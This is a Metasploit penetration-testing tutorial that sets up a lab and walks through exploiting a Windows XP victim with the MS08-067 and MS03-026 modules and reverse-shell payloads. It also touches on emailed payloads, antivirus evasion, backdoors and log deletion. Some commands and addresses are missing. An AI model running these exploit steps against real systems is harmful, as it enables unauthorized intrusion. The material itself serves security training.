Penetration test lab
Who should read this article?
This article would be useful to any industry that has to test regularly as part of compliance requirements or
regularly tests its security infrastructure as part of healthy security practice, and in particular to:
Penetration testers
Vulnerability assessment personnel
General security engineers
Security researchers
A basic understanding of computer fundamentals such as the command line and TCP/IP networking would be
helpful. The requirements are the same as for SANS 560.
Metasploit is a framework for storing, developing and deploying exploits. An exploit is a piece of code
that interacts with a vulnerable program so that the attacker (you) can execute code of your choosing on the victim's computer.
The framework also ships a useful tool known as msfpayload. It includes hundreds of working remote
exploits for a variety of platforms, and you can mix and match payloads, encoders and NOP-sled generators
with exploit modules to solve almost any exploit-related task.
A penetration tester simulates an attack on a customer's network by trying to find a way inside. Many such
attacks begin with a scanning tool such as NeXpose, Nessus or Nmap to look for network vulnerabilities;
however, most leading intrusion detection/prevention systems can alert the network
owner while a scan is in progress. Rather than scanning for an open port, a quieter alternative is to email a
payload to the victim that gives the attacker a foothold on the victim's network.
By following this article, youll evaluate your security posture using the same process skilled attackers
follow. Youll learn how to perform reconnaissance, exploit hosts and maneuver deeper into your network.
Before proceeding, here are some Metasploit terms and definitions.
Exploit: code that takes advantage of a security flaw within a system, network or application.
Payload: the code that the Metasploit framework makes the victim computer execute once the exploit succeeds.
Module: a self-contained piece of code plugged into the Metasploit framework; exploits, auxiliary scanners, payloads and encoders are all modules.
Shellcode: a small piece of machine code used as a payload, so called because it traditionally spawns a command shell.
What is msfpayload?
msfpayload is used in conjunction with msfcli and msfencode. Together they form a set of tools that creates
an executable which connects back to your machine, encodes that file, and sets up a listener for it. This method
bypasses the need for an exploit entirely, but requires social engineering to get your file onto the target's
computer and to get someone to execute it (or sneaking a flash drive in while they are not looking and running
it yourself, which I do not recommend). Sounds great, right? A skilled intruder who delivers a payload to
your network as an email attachment will want to make sure it evades detection by
antivirus software. Most antivirus vendors rely on a signature base to identify malicious code, so to avoid
detection an intruder must produce a payload that does not match any available signature. Note that a few
passes of msfencode alone rarely achieve this against current products, since vendors have long had signatures for
the encoders themselves; encoding was designed to remove bad characters from shellcode, not to defeat antivirus.
msfconsole is an all-in-one interface to most of the features in Metasploit. It can be used to launch
attacks, create listeners, and much more. We will be using msfconsole throughout these tutorials,
and mastering it will let you keep up with Metasploit's rapidly changing framework. Metasploit comes
preinstalled on BackTrack 5. To start msfconsole, open a terminal and type:
root@bt:~# cd /opt/framework3/msf3/
root@bt:/opt/framework3/msf3# msfconsole
msfcli is another way to access the Metasploit framework, but it focuses on scripting and interoperability
with other console-based tools. To view the msfcli help, type:
root@bt:~# cd /opt/framework3/msf3
root@bt:/opt/framework3/msf3# msfcli -h
Before running your exploit, it is useful to understand what the most common Metasploit commands do. Below are
the ones you will use most.
Command: Usage
search: Typing search along with a keyword lists the modules whose name or description matches that keyword.
show exploits: Lists the currently available exploits. There are remote exploits for various platforms and applications
including Windows, Linux, IIS, Apache and so on, which help to test the flexibility of Metasploit and understand how it works.
show payloads: With the same show command we can also list the available payloads; when an exploit is selected, only
payloads compatible with it are shown.
show options: Shows the options you have set and, just as importantly, the required ones you have forgotten to set. Each
exploit and payload comes with its own options.
info: Gives detailed information on an exploit or payload, for example info payload winbind for the payload called winbind.
use: Selects the module with the given name; the prompt changes to reflect the chosen module.
set RHOST: Sets the remote host, i.e. the address of the target.
set RPORT: Sets the port that Metasploit will connect to on the remote host.
set PAYLOAD: Selects the payload that runs once the service is exploited; a generic shell payload gives you a command shell.
set LPORT: Sets the payload's local port. For a bind payload this is the port opened on the target, so it must be one the
target can open (not in use and not reserved); for a reverse payload it is the port your handler listens on. Any free port
above 1024 will do. Change it after each successful exploit, because the previous session still occupies the old port.
exploit: Actually runs the exploit. The variant rexploit reloads the exploit code and runs it again, which lets you try
small changes to your module without restarting the console.
help: Gives basic information on all the commands not listed here.
Understanding Metasploit reliability rankings
As part of Metasploit's quality assurance process, Rapid7 ranks exploits by reliability. Knowing
the ins and outs of the rankings protects the stability of the systems you test, so your IT operations colleagues stay
happy. Each Metasploit exploit, and indeed each module, is classified according to five reliability
levels. Modules include exploits as well as auxiliary modules, such as brute-forcing modules, and payloads.
Understanding the reliability rankings is key to testing production systems safely.
Vulnerabilities are unintentional APIs
Vulnerabilities are APIs that were not intended by the developer. They are also undocumented
and unsupported. Some of these vulnerabilities are exploited more reliably than others, and there are
essentially three vectors used to rank them:
Exploit success rate: Some exploits will get you a session every time. Others are more hit-and-miss, or
they may only work on the first try but not the second.
Target system stability: Other exploits can get you a session, but the process makes the system unstable.
Think of a denial of service module as the extreme case of this vector.
Fingerprinting: Does the exploit reliably fingerprint the target system to ensure that it only fires against
tested targets? Using an exploit on the wrong system can destabilize it.
Only use exploit modules with a reliability ranking of Excellent or Great on production systems: the three
vectors above explain why.
Communicate with IT operations: Before testing on production systems, talk to the application owners
ahead of time to ensure that they are aware, buy into the process, and can alert you if anything goes awry.
Test during maintenance windows: To play it extra safe, conduct your penetration test during official
maintenance windows. We recommend not testing systems that are being serviced at the same time, since this makes
troubleshooting more difficult.
Use the audit report to analyze situations: Of course, production systems can also go down without your
having had any part in it. To protect you from unwarranted allegations, use the audit report in Metasploit
Express or Metasploit Pro to prove when you did and did not touch certain systems.
Throw the kitchen sink at test systems: Testing only with 4 and 5 star modules is right for production,
but less reliable exploits can still let in a malicious attacker who does not care about target system
stability. If you have a test system that mirrors your production environment, throw everything you have
at it to cast a wider net. We still recommend also testing production, since the test system may not be a perfect
image of it.
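As an added example (not code from the article or from Rapid7), here is a small Python filter that applies the rule above to a module listing: it parses rows in the shape of msfconsole's show exploits output and keeps only modules at or above a chosen rank. The listing text is constructed for the example; the module names are real Metasploit modules, but the rows were typed here rather than captured from a console, and the rank order follows the names the framework itself uses (manual, low, average, normal, good, great, excellent).

```python
import re

# Rank names in the order the Metasploit framework defines them, lowest to highest.
RANK_ORDER = ["manual", "low", "average", "normal", "good", "great", "excellent"]
RANK_VALUE = {name: index for index, name in enumerate(RANK_ORDER)}

# One module row: name, optional disclosure date, rank word, free-text description.
MODULE_ROW = re.compile(
    r"^\s*(?P<name>exploit/\S+)\s+(?:(?P<date>\d{4}-\d{2}-\d{2})\s+)?"
    r"(?P<rank>" + "|".join(RANK_ORDER) + r")\s+(?P<desc>.*?)\s*$",
    re.IGNORECASE,
)

# Constructed sample in the shape of msfconsole's listing (typed for this example,
# not captured from a console; the module names are real).
SAMPLE_LISTING = """\
   Name                                   Disclosure Date  Rank     Description
   ----                                   ---------------  ----     -----------
   exploit/windows/dcerpc/ms03_026_dcom   2003-07-16       great    MS03-026 Microsoft RPC DCOM Interface Overflow
   exploit/windows/smb/ms08_067_netapi    2008-10-28       great    MS08-067 Microsoft Server Service Relative Path Stack Corruption
   exploit/windows/smb/ms06_040_netapi    2006-08-08       good     MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow
   exploit/multi/handler                                   manual   Generic Payload Handler
"""


def parse_listing(text):
    """Turn listing rows into dicts; header and separator rows do not match."""
    modules = []
    for line in text.splitlines():
        match = MODULE_ROW.match(line)
        if match:
            modules.append({
                "name": match.group("name"),
                "date": match.group("date"),          # None when the row has no date
                "rank": match.group("rank").lower(),
                "description": match.group("desc"),
            })
    return modules


def production_safe(modules, minimum="great"):
    """Keep only modules whose rank is at least `minimum` (Great by default,
    which is the floor recommended above for production targets)."""
    floor = RANK_VALUE[minimum]
    return [m for m in modules if RANK_VALUE[m["rank"]] >= floor]


def rank_summary(modules):
    """Count modules per rank, handy for a quick sanity check before a test."""
    counts = {}
    for m in modules:
        counts[m["rank"]] = counts.get(m["rank"], 0) + 1
    return counts


if __name__ == "__main__":
    found = parse_listing(SAMPLE_LISTING)
    print("ranks:", rank_summary(found))
    for m in production_safe(found):
        print("production-safe:", m["name"], "(", m["rank"], ")")
```

To use it on real output, paste the console listing into SAMPLE_LISTING or read it from a file; rows the regex does not recognise are simply skipped, so a stray line of banner text does no harm.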
Now that we have the basic Metasploit concepts and commands down, let's hack a system!
Lab Setup
Victim machine
OS: Windows XP SP2
Attacker (our) machine
OS: Ubuntu 14.04 LTS 32-bit or BackTrack 5 R3
Metasploit version: 4.7
Download and Installation
The first step in our process is to download and install Metasploit. Although there is a Windows version,
I will focus on the Linux version because of its greater flexibility and capability. Let's walk through the
download and installation on my favourite Linux distro, Ubuntu.
To install the Metasploit 4.7 Framework (MSF 4.7) on Ubuntu 14.04, use the following
commands. This downloads and installs the generic Linux binary installer, which comes bundled with all the
components Metasploit needs to install and run. This should work for most users and is the
easiest and quickest way to get the Metasploit Framework running under Ubuntu and other Debian-based
Linux distributions.
First open a terminal window and type:
If you are installing on a 64-bit build of Ubuntu, use this instead:
This downloads the current version of the Metasploit framework installer via wget.
Before you can run the installer, you need to make it executable. In the terminal, add the execute (x) bit
to the Metasploit installer:
chmod +x
Now run the installer as root, using sudo and ./ followed by the name of the package:
sudo ./
Be patient; it will take Metasploit a few minutes to install and build its database. After it is done, you
are ready to run Metasploit. Simply type:
Now let's install the WebSploit Toolkit.
First download the WebSploit toolkit from
Unzip the archive and copy the WebSploit V.2.0.5 Toolkit folder into /pentest/web.
Now make the websploit script in the WebSploit folder executable: right-click the websploit file, open the
Permissions tab, tick "Allow executing file as program" and click Close (or run chmod +x on it from a terminal).
Configuring Metasploit on Windows
Installation of the Metasploit framework on Windows is simple and requires almost no effort. The framework
installer can be downloaded from the Metasploit official website. In this
section, we will learn how to configure Metasploit on the Windows operating system.
You will notice that there are two types of installer available for Windows. It is recommended to download
the complete installer of the Metasploit framework, which contains the console and all other relevant
dependencies, along with the database and runtime setup. If you already have a configured database
that you want to use for the framework, you can go for the mini installer instead, which only installs the console and its dependencies.
Once you have downloaded the installer, simply run it and sit back. It will automatically install
all the relevant components and set up the database for you. Once the installation is complete, you can access
the framework through the various shortcuts created by the installer.
You will find that the installer has created lots of shortcuts for you. Most things are click-and-go in
a Windows environment. Some of the options you will find are Metasploit web, cmd console, Metasploit
update, and so on.
Installing Metasploit with BackTrack 5 R3
BackTrack is the most popular operating system among security professionals for two reasons. First, it has
all the popular penetration testing tools preinstalled, which saves the cost of installing each one separately.
Second, it is a Linux-based operating system, which makes it less prone to virus attacks and gives more
stability during penetration testing. It saves you the time spent installing the relevant components and tools,
and the risk of hitting an unknown error during that installation. So, let's move on with the installation of
BackTrack 5 R3.
You can either install BackTrack on your hard disk or run it as a guest on a virtual machine. The installation
process is simple and the same as installing any Linux-based operating system.
The following steps show the entire process of installing BackTrack 5 R3:
When booting BackTrack, you will be asked to enter a username and password. The default
username for the root user is root and the password is toor.
Upon successful login, you can either work on the command line or enter startx to enter the GUI.
You can start the Metasploit framework either from the Applications menu or from the command line.
To launch Metasploit from the Applications menu, go to Applications | BackTrack | Exploitation Tools |
Network Exploitation Tools | Metasploit Framework, as shown in Figure 1:

Figure 1. Installing Metasploit with BackTrack 5 R3
Upgrading from R2 to R3
Those who do not want to start with a fresh installation can easily upgrade an existing installation
of R2 to R3.
First, make sure the current system is fully updated:
apt-get update && apt-get dist-upgrade
Running this command installs the new tools that were added for R3. Then, keeping the system architecture
in mind, choose the right package set.
32-bit tools
For installation on a 32-bit system, use the following command:
apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r
artemisa rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users
phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney
twofi truecrack uberharvest acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy
ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig
intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw
urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter bbqsql htexploit
smartphone-pentest-framework fern-wifi-cracker powersploit webhandler
64-bit tools
For installation on a 64-bit system, use the following command:
apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r rifiuti2
netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher
kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack
acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng
smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk
laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk
apktool ded dex2jar droidbox smali termineter multiforcer bbqsql htexploit smartphone-pentest-framework
fern-wifi-cracker powersploit webhandler
Installing and configuring PostgreSQL in BackTrack 5 R3
An important feature of Metasploit is its database support, which you can use to store your penetration
testing results. A penetration test produces a lot of information and can run for several days, so it
becomes essential to store intermediate results and findings.
A good penetration testing tool should have proper database integration to store results quickly and
efficiently. In this section, we deal with the installation and configuration of the database in
BackTrack 5 R3.
Metasploit comes with PostgreSQL as its default database. Let us first check the default settings of the
PostgreSQL database. They live in database.yml under /opt/metasploit/config. To view the file,
run the following commands:
root@bt:~# cd /opt/metasploit/config
root@bt:/opt/metasploit/config# cat database.yml
production:
  adapter: postgresql
  database: msf3
  username: msf3
  password: 8b826ac0
  host:
  port: 7175
  pool: 75
  timeout: 5
Notice the default username, password and database that have been created. Note these values down, as
they will be required further along. You can also change them to suit your preference. Since this file
holds the database password in cleartext, keep it readable only by root.
Now our job is to connect to the database and start using it. Let us launch the msfconsole
interface and see how to set up the database and store our results.
Let us first check the available database drivers:
msf > db_driver
[*] Active Driver: postgresql
[*] Available: postgresql, mysql
To connect msfconsole to the database, we use the db_connect command with the following syntax:
db_connect username:password@host:port/database_name
Here we use the default username, password, database name and port number that we just noted from
the database.yml file:
msf > db_connect msf3:8b826ac0@
On successful execution of the command, our database is fully configured.
Getting an error while connecting to the database
There is a chance of an error while trying to establish the connection. Two things to check
if an error arises:
Check the db_driver and db_connect commands and make sure you are using the right driver for
the database.
Start the database service from /etc/init.d (for PostgreSQL, /etc/init.d/postgresql start) and then try connecting again.
If the error persists, we can reinstall the database library and its headers with the following commands:
msf > gem install postgres
msf > apt-get install libpq-dev
Deleting the database
At any time you can drop the database and start again with fresh results. The following command
deletes the database:
msf > db_destroy msf3:8b826ac0@
Database msf3 dropped.
Using the database to store the penetration testing results
Let us now learn how to use our configured database to store the results of a penetration test.
If you have completed the previous section successfully, you are all set to use the database for storing
results. Enter the help command in msfconsole for a quick look at the database commands
available to us.
Let us start with a quick example. The db_nmap command stores the results of a port scan directly in the
database, along with all relevant information.
Launch a simple Nmap scan on the target machine to see how it works:
msf > db_nmap
[*] Nmap: Starting Nmap 5.51SVN ( ) at 2011-10-04 20:03 IST
[*] Nmap: Nmap scan report for
[*] Nmap: Host is up (0.0012s latency)
[*] Nmap: Not shown: 997 closed ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 135/tcp open msrpc
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: MAC Address: 08:00:27:34:A8:87 (Cadmus Computer Systems)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 1.94 seconds
As we can see, Nmap has produced the scan results and has automatically populated the msf3 database that
we are using.
We can also pass the -oX option to Nmap to store the result in XML format. This is very
useful for importing the scan results into third-party software such as the Dradis framework:
msf > nmap -A -oX report
[*] exec: nmap -A -oX report
Starting Nmap 5.51SVN ( ) at 2011-10-05 11:57 IST
Nmap scan report for
Host is up (0.0032s latency)
Not shown: 997 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27:34:A8:87 (Cadmus Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 0.76 seconds
Here, report is the name of the file in which the scan result is stored. Note that running nmap this way
executes the external binary without touching the database; use db_import report if you also want these
results in the msf3 database.
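As an added example, not part of the original article, the following Python parses an Nmap XML report of the kind written with -oX and lists each live host's open ports, which is the same information a tool such as Dradis pulls out of the file. The sample report is constructed to mirror the scan above: the MAC address and vendor are the ones shown there, while the IPv4 addresses 192.168.56.101 and 192.168.56.102 are assumed lab addresses.

```python
import xml.etree.ElementTree as ET

# Constructed report in the layout Nmap produces with -oX (typed for this example,
# not written by Nmap). 192.168.56.101/102 are assumed lab addresses.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -A -oX report 192.168.56.101" version="5.51SVN">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.56.101" addrtype="ipv4"/>
    <address addr="08:00:27:34:A8:87" addrtype="mac" vendor="Cadmus Computer Systems"/>
    <ports>
      <extraports state="closed" count="997"/>
      <port protocol="tcp" portid="135"><state state="open" reason="syn-ack"/><service name="msrpc" method="table" conf="3"/></port>
      <port protocol="tcp" portid="139"><state state="open" reason="syn-ack"/><service name="netbios-ssn" method="table" conf="3"/></port>
      <port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/><service name="microsoft-ds" method="table" conf="3"/></port>
    </ports>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="192.168.56.102" addrtype="ipv4"/>
  </host>
  <runstats><finished elapsed="0.76"/><hosts up="1" down="1" total="2"/></runstats>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return one dict per host that is up: ipv4 address, MAC/vendor if Nmap saw
    them (same L2 segment only), and (port, protocol, service) for each open port.
    ElementTree is fine for reports you generated yourself; for XML handed to you
    by a third party, parse it with defusedxml instead to avoid entity-expansion
    attacks on the importer."""
    root = ET.fromstring(xml_text)
    if root.tag != "nmaprun":
        raise ValueError("not an Nmap XML report")
    hosts = []
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # down hosts carry no port data worth importing
        entry = {"addr": None, "mac": None, "vendor": None, "open_ports": []}
        for address in host.findall("address"):
            if address.get("addrtype") == "ipv4":
                entry["addr"] = address.get("addr")
            elif address.get("addrtype") == "mac":
                entry["mac"] = address.get("addr")
                entry["vendor"] = address.get("vendor")
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            service = port.find("service")
            entry["open_ports"].append((
                int(port.get("portid")),
                port.get("protocol"),
                service.get("name") if service is not None else None,
            ))
        hosts.append(entry)
    return hosts


def hosts_with_open_port(hosts, portid, protocol="tcp"):
    """Addresses exposing a given port, e.g. 445/tcp candidates for the SMB exploits below."""
    return [
        h["addr"] for h in hosts
        if any(p == portid and proto == protocol for p, proto, _ in h["open_ports"])
    ]


if __name__ == "__main__":
    for h in parse_nmap_xml(SAMPLE_NMAP_XML):
        print(h["addr"], h["mac"], h["vendor"], h["open_ports"])
    print("SMB candidates:", hosts_with_open_port(parse_nmap_xml(SAMPLE_NMAP_XML), 445))
```

To run it against the report written above, replace SAMPLE_NMAP_XML with the contents of the report file.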
Now let's try to hack our victim
Method 1
Now open your BackTrack terminal and type:
cd /pentest/web/websploit
Step 1: choose option 3, Automatic Exploiter.
Step 2: choose option 1, Service Autopwn.
wsf:Autopwn > Enter Target IP Address: (IP address of the victim)
Autopwn will report that port 445 is open, so we will try the netapi exploit.
microsoft-ds (SMB over TCP port 445) is a very common service on Windows machines. Most servers have it
enabled, so they are easy targets unless a firewall filters port 445.
Step 3: Type search netapi in the console; this lists all exploit modules whose name matches
the pattern netapi.
Step 4: Type use exploit/windows/smb/ms08_067_netapi and then set the payload and addresses:
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set lhost (IP of your attacking machine)
msf exploit(ms08_067_netapi) > set rhost (IP of the victim)
msf exploit(ms08_067_netapi) > exploit
Note that lhost is your own address (the reverse Meterpreter connects back to it) and rhost is the victim's. The
module fingerprints the target's OS version and language to pick a return address; if that automatic choice is
wrong, the attempt can crash the Server service on the victim instead of giving a session, so set TARGET explicitly
when you know the exact build.
Method 2
In this method we hack into the victim machine using the RPC DCOM vulnerability. It is a buffer overflow
that lets the attacker execute code of their choice on the compromised box (note Microsoft's comment
under "impact of vulnerability" in the bulletin). Microsoft identifies it as MS03-026 in its database of vulnerabilities. In our
case, we will use it to open a reverse shell from our target system.
Step 1: Open the Metasploit console.
Be patient; it takes a while for Metasploit to load all of its modules. The current version of Metasploit has
823 exploits and 250 payloads.
Step 2: Find the Exploit
Metasploit lets you search its modules with the search command. In our case we are looking for a DCOM
exploit, so we can simply type:
msf > search dcom
Step 3: Set the Exploit
Now let's tell Metasploit which exploit we want to use. Type use followed by the name of our exploit,
exploit/windows/dcerpc/ms03_026_dcom:
msf > use exploit/windows/dcerpc/ms03_026_dcom
Note that the prompt has changed and now reflects our chosen exploit.
Step 4: Set the Options
Now that we have chosen our exploit, we can ask Metasploit what its options are. Typing show options
lists the options for executing this exploit, with the required ones marked:
msf exploit(ms03_026_dcom) > show options
Step 5: Set Remote Host
Metasploit now needs the RHOST. This is the IP address of the remote host, the machine
we are attacking. Use the actual IP address of the machine you are attacking;
tools such as nmap can help you find it. Notice in the picture above that Metasploit tells us
it will connect to port 135 (RPORT), the endpoint mapper that the DCOM service listens on.
msf exploit(ms03_026_dcom) > set RHOST
Step 6: Show Payloads
Next, we check which payloads are available for this exploit. Type show payloads at the Metasploit prompt:
msf exploit(ms03_026_dcom) > show payloads
Step 7: Set Payload
Now that we can see which payloads are available, we select generic/shell_reverse_tcp with the
set command. If the exploit succeeds, this payload connects back to us and gives us a remote command shell on the target.
msf exploit(ms03_026_dcom) > set PAYLOAD generic/shell_reverse_tcp
Step 8: Set Local Host
Now that we have chosen the exploit and the payload, we need to tell Metasploit the IP address of our
attacking machine, since a reverse payload connects back to it. LHOST is our own address, not the target's: use the
address of the interface on your machine that the victim can reach (ifconfig will show it), and make sure
nothing between you and the victim filters the inbound connection.
msf exploit(ms03_026_dcom) > set LHOST
Step 9: Exploit
Now we tell Metasploit to exploit the system:
msf exploit(ms03_026_dcom) > exploit
Step 10: Open a Shell on the Hacked System
Type sessions -i 1 to interact with the command shell that the payload has opened on the XP system; it appears in your
Metasploit console.
msf exploit(ms03_026_dcom) > sessions -i 1
To confirm that the command shell is on the Windows XP system, type dir to get a directory listing from the
Windows XP system that you now own:
C:\>dir
In this article, we have learned how to perform a network vulnerability assessment and exploitation using the Metasploit toolkit.
BackTrack Linux:
About the Author
Maher Abdelshkour is a Sr. Network Engineer and Information Security Analyst III in a large Company for the
past 16 years, in the field of Information Technology with extensive network engineering, administration, and
troubleshooting experience in Enterprise and Service Provider networks. He is an expert in intrusion detection
systems, Penetration Testing and in designing systems to meet externally defined security standards.
Multiphase Penetration Testing:
Using BackTrack Linux, Metasploit, and
by Lance Cleghorn, Associate of ISC2: CISSP
The EC-Council identifies five stages of attack that are common to cyber penetration. [1]
These stages of attack may be used to categorize incidents where a network or host has
been compromised. Because these stages are common to real attacks, they are used
by ethical hackers to conduct penetration testing. An ethical hacker, or white-hat hacker, may
use these steps in order or may selectively choose the steps that work best for the particular
vulnerability. [2]
When a penetration tester begins to examine a target they enter the first phase of attack, the reconnaissance
phase. In this first phase, the attacker or tester tries to discover as much information about the
victim as possible. In some cases this phase may involve choosing a target if no specific target is given.
(Penetration testers are often given a target, whereas attackers must decide on one.) [5] This phase may involve
using search engines or other Internet-based utilities to learn about the target. [1]
After a target has been chosen the tester must attempt to enumerate the target as thoroughly as possible.
This enumeration is referred to by the EC-Council as the scanning phase. [1] While some enumeration
occurs in the reconnaissance phase, it is in the scanning phase that most of it happens. The tester will try
to uncover detailed information about services by viewing the banners that ports present when sent
requests. [4] This phase may also involve scanning a large target to identify a smaller subset of
vulnerable nodes. [8]
After the tester has enumerated targets in the scanning phase they begin to plan and perform the third phase,
the gaining access phase. [1] In the gaining access phase the tester plans a strategy to attack targets
and compromise confidentiality and integrity. The tester needs to decide the level of overtness they
are comfortable with; based on that level the tester begins to attack the vulnerable nodes
and services. This phase is considered complete when the tester has a foothold in the target. [1] The tester
may choose to split this phase into a second part where the foothold is spread and expanded;
alternatively the tester could complete all phases and begin again in order to expand the foothold.
After establishing an initial foothold in the victim, the tester aims to maintain that access for a long-term
compromise. In a real-world compromise the attacker digs in to capture data that passes
through the victim; maintaining access is the phase where the tester solidifies their grip on the target. [12]
In this phase the tester brings tools into the victim and sets up backdoor services that can be used to
bypass authentication mechanisms. The tester's primary goal in this phase is to make it easier to access
the victim, and to make that access look legitimate by adding valid credentials and impersonating
normal usage. [4]
In the fifth and final phase the tester works to cover up the evidence that a vulnerability has been exploited and
an attacker gained access. [1] There are several motivations for carrying out this phase
correctly. In a real attack the attacker wishes to destroy evidence to avoid being detected and, if
detected, to avoid prosecution. [4] The tester deletes logs and tries to manipulate detection methods so that they
do not report the compromise. The EC-Council refers to this final phase of the multiphase attack as the covering
tracks phase. [1]
Metasploit, Armitage, and BackTrack
Metasploit was designed as a framework into which penetration testers could load exploits and conduct
tests against vulnerabilities. [9] The Metasploit framework is developed and hosted by the security company
Rapid7 and is currently on version 4.6. [9] The framework is continually updated with new and modified
modules that may be executed to find and test vulnerabilities. It is made up of almost a dozen
command-line utilities that may be used in conjunction. Because the framework is command-line
based and has a substantial learning curve, Strategic Cyber LLC designed the Armitage graphical
user interface (GUI). [3]
Armitage is a front end for the Metasploit framework and can be used to organize and execute a multiphase
penetration test. Many security professionals new to penetration testing prefer to learn the
Metasploit framework through the Armitage GUI. [5] While some functions of the Metasploit
framework require you to delve into the command line, many of the phases of attack can be
accomplished through Armitage. Many veterans of the penetration testing field have acknowledged
that penetration testers should use GUIs like Armitage because they are closer to the utilities used by
actual attackers. [4]
Both Metasploit and Armitage have come as standard installs in the BackTrack distribution of Linux since
version 5. BackTrack Linux is widely considered the operating system of choice for penetration testers. [5]
The operating system includes a plethora of utilities to aid in performing penetration tests. An experienced
user is often able to use the distribution to conduct a full multiphase penetration test without having to access
the Internet to download additional tools or documentation. BackTrack is currently on version 5 revision
3, although this may be the last revision to use the name BackTrack, as the developers intend the
next version to be called Kali Linux.
Reconnaissance Phase
Because many penetration testers know their target before beginning a test, the reconnaissance
phase is largely limited to sniffing the network. BackTrack includes several options for sniffing traffic, as
shown in Figure 1. Wireshark is an industry favourite because of the sophistication of its GUI. A tester can
use Wireshark or a comparable network monitor to capture traffic passively as it passes from
node to node. [8] A packet capture is a treasure trove of information for a skilled penetration tester. The tester
can scan and filter a packet capture to look for vulnerable services and even begin to capture usernames,
hostnames and, in some cases, passwords.
Figure 1. BackTrack Sniffing Tools
Wireshark and other sniffers work by placing the network interface card (NIC) into promiscuous mode. In
normal operation the NIC accepts only frames addressed to its own MAC address (plus broadcast and multicast)
and discards everything else; in promiscuous mode it accepts every frame it sees. Note that on a switched
network the NIC only sees traffic switched to its own port, so capturing other hosts' conversations requires a
mirror (SPAN) port, a hub, or an active technique such as ARP spoofing. A tester using Wireshark can write
display filters to pull important information out of the capture, and can also run the capture through a set of
Snort rules to look for vulnerabilities. Snort is an open source intrusion detection system in which an
administrator writes rules to match traffic patterns. [11]
Snort is a more robust solution for traffic pattern matching than Wireshark, so the two can be used together
during the reconnaissance phase. [11] At this point in the multiphase attack the tester should have an idea of
vulnerable services or nodes and, ideally, some credentials. The tester should not skip this phase, but should
also not linger in it, since later phases are more likely to yield greater benefits.
Scanning Phase
In the scanning phase Metasploit and Armitage become more prominent in the penetration testing process.
Nmap and many other enumeration modules are provided in the Metasploit Framework, and Armitage can help
organize the information gathered here. Nmap has been used by networking professionals for many years and
is preferred for its simplicity and robust options. [4] Figure 2 shows the enumeration modules available in the
Metasploit Framework.
Figure 2. Armitage Enumeration Modules
Many testers begin with a light ping sweep or, in a less sensitive network, a service scan. Nmap provides
both, along with options for avoiding intrusion detection and prevention systems. Nmap is an extraordinary
utility for enumerating the IP stack, and Metasploit, and particularly Armitage, can store and use its output.
After enumerating the addressing scheme and the services in use, the tester can target particular parts of the
network and begin to map it.
A good penetration tester should be comfortable with all the tools available to them. Figure 3 shows the
BackTrack utilities for scanning and enumeration. Nessus is a vulnerability scanner used by the United States
Department of Defense and trusted by many penetration testers. [4] Nessus results and other standard scan
formats can also be imported into Armitage to identify hosts, services and vulnerabilities. By the end of this
phase the tester should have a solid plan, with prime targets in mind and a list of attacks to perform in the
third phase.
Figure 3. BackTrack Scanning and Enumeration Tools
Gaining Access
The third phase of the multiphase attack is where testers or attackers cross a line and gain access to nodes
without authorization. The tester must balance a successful penetration test against the integrity of the
client's network. Clients have to weigh the benefit of a real-world penetration test against the potential harm
to their production network, and a talented tester understands the limits of their tools and the point at which
they become a threat to the availability of that network.
The third phase also presents a choice. The multiphase methodology can be run as a single pass, working
through the phases once, or repeated across the different areas of the network. If the tester works through
the phases only once, the gaining access phase should be split into two parts: first gaining initial access,
then spreading to all the targets identified in the scanning phase.
The choice between a single pass and multiple passes can depend on the target network or on the tester's
preference. A larger network that divides easily into smaller sections may be tested more effectively by
running the phases more than once. In either case the tester must consider using a compromised host as a
launchpad (pivot) for further exploitation. [6] This must be evaluated carefully because it can skew results: a
vulnerability may only be exploitable once another host has already been compromised. [6] Launchpad tests
should always be marked as such in the final report, with the methodology explained so the client understands
them. The tester must also remember that a real attacker will use any method available and will certainly
pivot through a compromised host to gain further access.
In this phase the tester begins running exploits against the vulnerabilities identified during scanning.
Metasploit includes modules for a wide array of attacks; to fully gain access the tester should be able to
demonstrate that the confidentiality of a system or set of data can be breached. [10] The attack must fit the
service: a brute-force attack may be appropriate for a telnet service, whereas a directory traversal attack may
be better against an FTP or HTTP server. Choosing the right exploits is an essential part of penetration
testing; running too wide a variety of them increases the risk of being detected and blocked. The tester must
rely heavily on the information from the first two phases to pick the exploits with the highest chance of
success.
Choosing a payload is another key decision in this phase. The tester may only get one payload onto the
target, so deciding whether it should simply signal success or attempt to fully compromise the host matters. A
